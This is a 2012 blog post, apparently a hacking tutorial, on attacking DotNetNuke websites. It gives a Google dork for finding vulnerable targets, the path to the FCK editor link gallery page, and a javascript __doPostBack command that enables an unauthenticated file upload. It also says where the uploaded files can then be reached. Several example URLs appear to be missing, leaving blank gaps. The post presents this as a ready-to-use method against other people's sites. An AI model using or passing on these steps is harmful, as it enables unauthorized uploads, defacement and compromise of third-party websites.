Search This Blog

Sunday 5 August 2012

DNN (Dot Net Nuke) Hacking :-



DNN (Dot Net Nuke) Hacking    


  DotNetNuke (DNN) is an open source Portal and Content Management Framework, based on Microsoft's .NET technology.DNN offers a robust, extensible and fully functional framework for the          development of a broad range of commercial portal applications.     DotNetNuke is the leading Web Content Management Platform for     Microsoft .NET, powering more than 600,000 web sites worldwide 



First use a Google dork to find the appropriate target.

 inurl:/tabid/36/language/en-US/Default.aspx 






Now I Open this Website



Then check the required vulnerability on the website just place this code after  the web address. (Just See)

    /Home/tabid/36/Language/en-US/Default.aspx
Now replace it with
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx  

For example if you got  
Replace it  




























Now Put this Javascript Code to the address bar

javascript:__doPostBack('ctlURL$cmdUpload','')



It will allow you to upload a file on this website you can upload text ~ swf ~  jpg ~ gif ~ pdf ~ Files.






After uploading files you can find your file on this address   http://www.example.com/portals/0/yourfile.extension 
 So In this Case  






1 comment:

  1. I checked you link for checking our hacking website. It is very important to know about our website activity. I like this method.

    ReplyDelete